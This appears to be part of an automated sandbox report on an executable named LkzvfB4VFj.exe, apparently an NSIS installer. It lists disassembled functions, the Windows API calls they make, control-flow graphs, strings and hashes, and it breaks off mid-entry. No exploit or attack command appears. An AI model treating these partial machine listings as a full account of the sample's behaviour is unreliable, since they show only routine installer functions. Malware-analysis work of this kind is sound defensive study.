                                                  Function 0040646B Relevance: 3.0, APIs: 2, Instructions: 14fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(75843410,0042C0E0,0042BC98,00405BC0,0042BC98,0042BC98,00000000,0042BC98,0042BC98,75843410,?,C:\Users\user\AppData\Local\Temp\,004058DF,?,75843410,C:\Users\user\AppData\Local\Temp\), ref: 00406476
                                                  • FindClose.KERNELBASE(00000000), ref: 00406482
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Find$CloseFileFirst
                                                  • String ID:
                                                  • API String ID: 2295610775-0
                                                  • Opcode ID: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                  • Instruction ID: 43645372537bfa69987f3f85d1e9d0a1072f39b89fcefe97c81bac3be47e5bfd
                                                  • Opcode Fuzzy Hash: 834111d6c5cf34f6f1a5acdd2360b111687db49f4aa82fd60f9155d80f0d726b
                                                  • Instruction Fuzzy Hash: 9AD01231514120DFC3502B786D4C84F7A589F05330321CB36F86AF22E0C7348C2296EC
                                                  Function 004027A1 Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                  Download Yara Rule
                                                  APIs
                                                  • FindFirstFileA.KERNELBASE(00000000,?,00000002), ref: 004027B0
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: FileFindFirst
                                                  • String ID:
                                                  • API String ID: 1974802433-0
                                                  • Opcode ID: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                  • Instruction ID: cbd12963852304709d998dbd60bf7e8f33587a64a337c4fd13578998f516bfb3
                                                  • Opcode Fuzzy Hash: a5b213f8be24180874f9adf411d6afc31dfa0cb9f64df1b0b64d1ebf68b7fd5b
                                                  • Instruction Fuzzy Hash: 3EF0A072604110DED711EBA49A49AFEB768AF61314F60457FF112B20C1D7B889469B3A
                                                  Function 0040390A Relevance: 45.7, APIs: 13, Strings: 13, Instructions: 215stringregistryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 134 40390a-403922 call 406500 137 403924-403934 call 406055 134->137 138 403936-403967 call 405fde 134->138 146 40398a-4039b3 call 403bcf call 405b7d 137->146 143 403969-40397a call 405fde 138->143 144 40397f-403985 lstrcatA 138->144 143->144 144->146 152 4039b9-4039be 146->152 153 403a3a-403a42 call 405b7d 146->153 152->153 154 4039c0-4039e4 call 405fde 152->154 159 403a50-403a75 LoadImageA 153->159 160 403a44-403a4b call 40618a 153->160 154->153 161 4039e6-4039e8 154->161 163 403af6-403afe call 40140b 159->163 164 403a77-403aa7 RegisterClassA 159->164 160->159 168 4039f9-403a05 lstrlenA 161->168 169 4039ea-4039f7 call 405aba 161->169 176 403b00-403b03 163->176 177 403b08-403b13 call 403bcf 163->177 165 403bc5 164->165 166 403aad-403af1 SystemParametersInfoA CreateWindowExA 164->166 174 403bc7-403bce 165->174 166->163 170 403a07-403a15 lstrcmpiA 168->170 171 403a2d-403a35 call 405a8f call 4060f7 168->171 169->168 170->171 175 403a17-403a21 GetFileAttributesA 170->175 171->153 180 403a23-403a25 175->180 181 403a27-403a28 call 405ad6 175->181 176->174 187 403b19-403b33 ShowWindow call 406492 177->187 188 403b9c-403ba4 call 4052f0 177->188 180->171 180->181 181->171 195 403b35-403b3a call 406492 187->195 196 403b3f-403b51 GetClassInfoA 187->196 193 403ba6-403bac 188->193 194 403bbe-403bc0 call 40140b 188->194 193->176 197 403bb2-403bb9 call 40140b 193->197 194->165 195->196 200 403b53-403b63 GetClassInfoA RegisterClassA 196->200 201 403b69-403b9a DialogBoxParamA call 40140b call 40385a 196->201 197->176 200->201 201->174
                                                  APIs
                                                    • Part of subcall function 00406500: GetModuleHandleA.KERNEL32(?,?,?,004033BB,0000000B), ref: 00406512
                                                    • Part of subcall function 00406500: GetProcAddress.KERNEL32(00000000,?), ref: 0040652D
                                                  • lstrcatA.KERNEL32(1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75843410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\LkzvfB4VFj.exe",00000000), ref: 00403985
                                                  • lstrlenA.KERNEL32(Call,?,?,?,Call,00000000,C:\Users\user\tranchet,1033,0042A890,80000001,Control Panel\Desktop\ResourceLocale,00000000,0042A890,00000000,00000002,75843410), ref: 004039FA
                                                  • lstrcmpiA.KERNEL32(?,.exe), ref: 00403A0D
                                                  • GetFileAttributesA.KERNEL32(Call), ref: 00403A18
                                                  • LoadImageA.USER32(00000067,00000001,00000000,00000000,00008040,C:\Users\user\tranchet), ref: 00403A61
                                                    • Part of subcall function 00406055: wsprintfA.USER32 ref: 00406062
                                                  • RegisterClassA.USER32(0042EBC0), ref: 00403A9E
                                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00403AB6
                                                  • CreateWindowExA.USER32(00000080,_Nb,00000000,80000000,?,?,?,?,00000000,00000000,00000000), ref: 00403AEB
                                                  • ShowWindow.USER32(00000005,00000000), ref: 00403B21
                                                  • GetClassInfoA.USER32(00000000,RichEdit20A,0042EBC0), ref: 00403B4D
                                                  • GetClassInfoA.USER32(00000000,RichEdit,0042EBC0), ref: 00403B5A
                                                  • RegisterClassA.USER32(0042EBC0), ref: 00403B63
                                                  • DialogBoxParamA.USER32(?,00000000,00403CA7,00000000), ref: 00403B82
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Class$Info$RegisterWindow$AddressAttributesCreateDialogFileHandleImageLoadModuleParamParametersProcShowSystemlstrcatlstrcmpilstrlenwsprintf
                                                  • String ID: "C:\Users\user\Desktop\LkzvfB4VFj.exe"$.DEFAULT\Control Panel\International$.exe$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\tranchet$Call$Control Panel\Desktop\ResourceLocale$RichEd20$RichEd32$RichEdit$RichEdit20A$_Nb
                                                  • API String ID: 1975747703-2813313323
                                                  • Opcode ID: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                  • Instruction ID: 74cd8b4f7d81cde8c77274d740e3983652abf123a0ec58253698c850822a2f16
                                                  • Opcode Fuzzy Hash: eddc3fe444e159470dd51134533c2a37fedb4af5c6bfbfbca7f7312343edc14b
                                                  • Instruction Fuzzy Hash: EC61A5702402016ED220FB669D46F373ABCEB4474DF50403FF995B62E3DA7DA9068A2D
                                                  Function 00402EA1 Relevance: 26.4, APIs: 5, Strings: 10, Instructions: 181memoryCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 208 402ea1-402eef GetTickCount GetModuleFileNameA call 405c90 211 402ef1-402ef6 208->211 212 402efb-402f29 call 4060f7 call 405ad6 call 4060f7 GetFileSize 208->212 213 4030d1-4030d5 211->213 220 403014-403022 call 402e3d 212->220 221 402f2f 212->221 227 403024-403027 220->227 228 403077-40307c 220->228 222 402f34-402f4b 221->222 225 402f4d 222->225 226 402f4f-402f58 call 4032ea 222->226 225->226 234 40307e-403086 call 402e3d 226->234 235 402f5e-402f65 226->235 230 403029-403041 call 403300 call 4032ea 227->230 231 40304b-403075 GlobalAlloc call 403300 call 4030d8 227->231 228->213 230->228 254 403043-403049 230->254 231->228 259 403088-403099 231->259 234->228 238 402fe1-402fe5 235->238 239 402f67-402f7b call 405c4b 235->239 244 402fe7-402fee call 402e3d 238->244 245 402fef-402ff5 238->245 239->245 257 402f7d-402f84 239->257 244->245 250 403004-40300c 245->250 251 402ff7-403001 call 4065b7 245->251 250->222 258 403012 250->258 251->250 254->228 254->231 257->245 263 402f86-402f8d 257->263 258->220 260 4030a1-4030a6 259->260 261 40309b 259->261 264 4030a7-4030ad 260->264 261->260 263->245 265 402f8f-402f96 263->265 264->264 266 4030af-4030ca SetFilePointer call 405c4b 264->266 265->245 267 402f98-402f9f 265->267 271 4030cf 266->271 267->245 269 402fa1-402fc1 267->269 269->228 270 402fc7-402fcb 269->270 272 402fd3-402fdb 270->272 273 402fcd-402fd1 270->273 271->213 272->245 274 402fdd-402fdf 272->274 273->258 273->272 274->245
                                                  APIs
                                                  • GetTickCount.KERNEL32 ref: 00402EB2
                                                  • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\LkzvfB4VFj.exe,00000400), ref: 00402ECE
                                                    • Part of subcall function 00405C90: GetFileAttributesA.KERNELBASE(00000003,00402EE1,C:\Users\user\Desktop\LkzvfB4VFj.exe,80000000,00000003), ref: 00405C94
                                                    • Part of subcall function 00405C90: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 00405CB6
                                                  • GetFileSize.KERNEL32(00000000,00000000,00437000,00000000,C:\Users\user\Desktop,C:\Users\user\Desktop,C:\Users\user\Desktop\LkzvfB4VFj.exe,C:\Users\user\Desktop\LkzvfB4VFj.exe,80000000,00000003), ref: 00402F1A
                                                  • GlobalAlloc.KERNELBASE(00000040,00000020), ref: 00403050
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: File$AllocAttributesCountCreateGlobalModuleNameSizeTick
                                                  • String ID: "C:\Users\user\Desktop\LkzvfB4VFj.exe"$@TA$C:\Users\user\AppData\Local\Temp\$C:\Users\user\Desktop$C:\Users\user\Desktop\LkzvfB4VFj.exe$Error launching installer$Inst$Installer integrity check has failed. Common causes includeincomplete download and damaged media. Contact theinstaller's author to obtain a new copy.More information at:http://nsis.sf.net/NSIS_Error$Null$soft
                                                  • API String ID: 2803837635-817629889
                                                  • Opcode ID: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                  • Instruction ID: b77d5a27d8a3a8735664692b17331c00252a13d20c8f5ee7c59d5cd6c332e3a5
                                                  • Opcode Fuzzy Hash: d2642f5c1e57ff917447350ecc80b65a471f1c26fbd3ec2d1bf2d56bf534e989
                                                  • Instruction Fuzzy Hash: B851E471A00204ABDF20AF64DD85FAF7AB8AB14359F60413BF500B22D1C7B89E858B5D
                                                  Function 0040618A Relevance: 17.7, APIs: 7, Strings: 3, Instructions: 199stringCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 496 40618a-406195 497 406197-4061a6 496->497 498 4061a8-4061be 496->498 497->498 499 4061c4-4061cf 498->499 500 4063af-4063b3 498->500 499->500 501 4061d5-4061dc 499->501 502 4061e1-4061eb 500->502 503 4063b9-4063c3 500->503 501->500 502->503 506 4061f1-4061f8 502->506 504 4063c5-4063c9 call 4060f7 503->504 505 4063ce-4063cf 503->505 504->505 508 4063a2 506->508 509 4061fe-406232 506->509 510 4063a4-4063aa 508->510 511 4063ac-4063ae 508->511 512 406238-406242 509->512 513 40634f-406352 509->513 510->500 511->500 514 406244-406248 512->514 515 40625c 512->515 516 406382-406385 513->516 517 406354-406357 513->517 514->515 523 40624a-40624e 514->523 520 406263-40626a 515->520 521 406393-4063a0 lstrlenA 516->521 522 406387-40638e call 40618a 516->522 518 406367-406373 call 4060f7 517->518 519 406359-406365 call 406055 517->519 534 406378-40637e 518->534 519->534 525 40626c-40626e 520->525 526 40626f-406271 520->526 521->500 522->521 523->515 529 406250-406254 523->529 525->526 532 406273-40628e call 405fde 526->532 533 4062aa-4062ad 526->533 529->515 530 406256-40625a 529->530 530->520 539 406293-406296 532->539 537 4062bd-4062c0 533->537 538 4062af-4062bb GetSystemDirectoryA 533->538 534->521 536 406380 534->536 540 406347-40634d call 4063d2 536->540 542 4062c2-4062d0 GetWindowsDirectoryA 537->542 543 40632d-40632f 537->543 541 406331-406334 538->541 544 406336-40633a 539->544 545 40629c-4062a5 call 40618a 539->545 540->521 541->540 541->544 542->543 543->541 546 4062d2-4062dc 543->546 544->540 551 40633c-406342 lstrcatA 544->551 545->541 548 4062f6-40630c SHGetSpecialFolderLocation 546->548 549 4062de-4062e1 546->549 554 40632a 548->554 555 40630e-406328 SHGetPathFromIDListA CoTaskMemFree 548->555 549->548 553 4062e3-4062ea 549->553 551->540 557 4062f2-4062f4 553->557 554->543 555->541 555->554 557->541 557->548
                                                  APIs
                                                  • GetSystemDirectoryA.KERNEL32(Call,00000400), ref: 004062B5
                                                  • GetWindowsDirectoryA.KERNEL32(Call,00000400,?,0042A070,00000000,00405256,0042A070,00000000), ref: 004062C8
                                                  • SHGetSpecialFolderLocation.SHELL32(00405256,758423A0,?,0042A070,00000000,00405256,0042A070,00000000), ref: 00406304
                                                  • SHGetPathFromIDListA.SHELL32(758423A0,Call), ref: 00406312
                                                  • CoTaskMemFree.OLE32(758423A0), ref: 0040631E
                                                  • lstrcatA.KERNEL32(Call,\Microsoft\Internet Explorer\Quick Launch), ref: 00406342
                                                  • lstrlenA.KERNEL32(Call,?,0042A070,00000000,00405256,0042A070,00000000,00000000,00424248,758423A0), ref: 00406394
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: Directory$FolderFreeFromListLocationPathSpecialSystemTaskWindowslstrcatlstrlen
                                                  • String ID: Call$Software\Microsoft\Windows\CurrentVersion$\Microsoft\Internet Explorer\Quick Launch
                                                  • API String ID: 717251189-1230650788
                                                  • Opcode ID: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                  • Instruction ID: 7f70e83a291e570019a42af90a820afb382591873456cc4d5332d159a7ba1b0c
                                                  • Opcode Fuzzy Hash: 8246b69a52679e6fada9b088fd1c5cd7587de1068ebf998f283e7bad78f4f284
                                                  • Instruction Fuzzy Hash: 58612470A00110AADF206F65CC90BBE3B75AB55310F52403FE943BA2D1C77C8962DB9E
                                                  Function 00401759 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 147stringtimeCOMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 627 401759-40177c call 402bce call 405afc 632 401786-401798 call 4060f7 call 405a8f lstrcatA 627->632 633 40177e-401784 call 4060f7 627->633 639 40179d-4017a3 call 4063d2 632->639 633->639 643 4017a8-4017ac 639->643 644 4017ae-4017b8 call 40646b 643->644 645 4017df-4017e2 643->645 653 4017ca-4017dc 644->653 654 4017ba-4017c8 CompareFileTime 644->654 647 4017e4-4017e5 call 405c6b 645->647 648 4017ea-401806 call 405c90 645->648 647->648 655 401808-40180b 648->655 656 40187e-4018a7 call 40521e call 4030d8 648->656 653->645 654->653 657 401860-40186a call 40521e 655->657 658 40180d-40184f call 4060f7 * 2 call 40618a call 4060f7 call 405813 655->658 670 4018a9-4018ad 656->670 671 4018af-4018bb SetFileTime 656->671 668 401873-401879 657->668 658->643 692 401855-401856 658->692 672 402a63 668->672 670->671 674 4018c1-4018cc CloseHandle 670->674 671->674 678 402a65-402a69 672->678 676 4018d2-4018d5 674->676 677 402a5a-402a5d 674->677 680 4018d7-4018e8 call 40618a lstrcatA 676->680 681 4018ea-4018ed call 40618a 676->681 677->672 686 4018f2-402382 680->686 681->686 690 402387-40238c 686->690 691 402382 call 405813 686->691 690->678 691->690 692->668 693 401858-401859 692->693 693->657
                                                  APIs
                                                  • lstrcatA.KERNEL32(00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 00401798
                                                  • CompareFileTime.KERNEL32(-00000014,?,Call,Call,00000000,00000000,Call,C:\Users\user\tranchet\Trykmaalere,00000000,00000000,00000031), ref: 004017C2
                                                    • Part of subcall function 004060F7: lstrcpynA.KERNEL32(?,?,00000400,0040341A,Aftopningen Setup,NSIS Error,?,00000007,00000009,0000000B), ref: 00406104
                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000,?), ref: 00405257
                                                    • Part of subcall function 0040521E: lstrlenA.KERNEL32(00403233,0042A070,00000000,00424248,758423A0,?,?,?,?,?,?,?,?,?,00403233,00000000), ref: 00405267
                                                    • Part of subcall function 0040521E: lstrcatA.KERNEL32(0042A070,00403233,00403233,0042A070,00000000,00424248,758423A0), ref: 0040527A
                                                    • Part of subcall function 0040521E: SetWindowTextA.USER32(0042A070,0042A070), ref: 0040528C
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004052B2
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001007,00000000,00000001), ref: 004052CC
                                                    • Part of subcall function 0040521E: SendMessageA.USER32(?,00001013,?,00000000), ref: 004052DA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: MessageSend$lstrcatlstrlen$CompareFileTextTimeWindowlstrcpyn
                                                  • String ID: C:\Users\user\AppData\Local\Temp\nsi9279.tmp$C:\Users\user\AppData\Local\Temp\nsi9279.tmp\System.dll$C:\Users\user\tranchet\Trykmaalere$Call
                                                  • API String ID: 1941528284-2295437664
                                                  • Opcode ID: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                  • Instruction ID: bb6028c3778eb4cec0c6c1d7eb8bf073a5325157b60575559d09146ef789c5eb
                                                  • Opcode Fuzzy Hash: 90f03a76fcf5146749e92d53d58810ea094b6bbbf58b510143803768f557fb10
                                                  • Instruction Fuzzy Hash: D4419A32900515BACB107BB5CC45DAF3678EF05329F20833FF426B51E1DA7C8A529A6D
                                                  Function 004030D8 Relevance: 10.7, APIs: 4, Strings: 2, Instructions: 166COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 694 4030d8-4030ec 695 4030f5-4030fe 694->695 696 4030ee 694->696 697 403100 695->697 698 403107-40310c 695->698 696->695 697->698 699 40311c-403129 call 4032ea 698->699 700 40310e-403117 call 403300 698->700 704 4032d8 699->704 705 40312f-403133 699->705 700->699 706 4032da-4032db 704->706 707 403283-403285 705->707 708 403139-403182 GetTickCount 705->708 711 4032e3-4032e7 706->711 709 4032c5-4032c8 707->709 710 403287-40328a 707->710 712 4032e0 708->712 713 403188-403190 708->713 714 4032ca 709->714 715 4032cd-4032d6 call 4032ea 709->715 710->712 716 40328c 710->716 712->711 717 403192 713->717 718 403195-4031a3 call 4032ea 713->718 714->715 715->704 727 4032dd 715->727 720 40328f-403295 716->720 717->718 718->704 726 4031a9-4031b2 718->726 723 403297 720->723 724 403299-4032a7 call 4032ea 720->724 723->724 724->704 732 4032a9-4032b5 call 405d37 724->732 729 4031b8-4031d8 call 406625 726->729 727->712 736 40327b-40327d 729->736 737 4031de-4031f1 GetTickCount 729->737 738 4032b7-4032c1 732->738 739 40327f-403281 732->739 736->706 740 4031f3-4031fb 737->740 741 403236-403238 737->741 738->720 742 4032c3 738->742 739->706 743 403203-403233 MulDiv wsprintfA call 40521e 740->743 744 4031fd-403201 740->744 745 40323a-40323e 741->745 746 40326f-403273 741->746 742->712 743->741 744->741 744->743 749 403240-403247 call 405d37 745->749 750 403255-403260 745->750 746->713 747 403279 746->747 747->712 755 40324c-40324e 749->755 751 403263-403267 750->751 751->729 754 40326d 751->754 754->712 755->739 756 403250-403253 755->756 756->751
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CountTick$wsprintf
                                                  • String ID: ... %d%%$HBB
                                                  • API String ID: 551687249-372310663
                                                  • Opcode ID: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                  • Instruction ID: fb515496a62f3aa3a261881475cff076317c99cf113f2c02ef85df511ffa7adb
                                                  • Opcode Fuzzy Hash: 6105a75ac29723741842d4acb1fda97f5bbbd1560d169b08801a999ce2df6a86
                                                  • Instruction Fuzzy Hash: 68515C71900219ABCB10DF95DA44A9E7BA8EF54356F1481BFE800B72D0C7789A41CBAD
                                                  Function 00401E35 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43COMMON
                                                  Download Yara Rule

                                                  Control-flow Graph

                                                  APIs
                                                  • GetDC.USER32(?), ref: 00401E38
                                                  • GetDeviceCaps.GDI32(00000000,0000005A), ref: 00401E52
                                                  • MulDiv.KERNEL32(00000000,00000000), ref: 00401E5A
                                                  • ReleaseDC.USER32(?,00000000), ref: 00401E6B
                                                  • CreateFontIndirectA.GDI32(0040B838), ref: 00401EBA
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000000.00000002.92762367833.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                  • Associated: 00000000.00000002.92762308892.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762438326.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.000000000044E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762513961.0000000000455000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                  • Associated: 00000000.00000002.92762976696.0000000000458000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_0_2_400000_LkzvfB4VFj.jbxd
                                                  Similarity
                                                  • API ID: CapsCreateDeviceFontIndirectRelease
                                                  • String ID: Calibri
                                                  • API String ID: 3808545654-1409258342
                                                  • Opcode ID: f10f52d3ac84b2d12136eae3b4e18ea67906ed9852a07f942bb56bd2ae0fd4ab
                                                  • Instruction ID: 5cb61850c30ba341adb392aac0b64178207aa51c0a8ebf491f77c064e1fc76ea
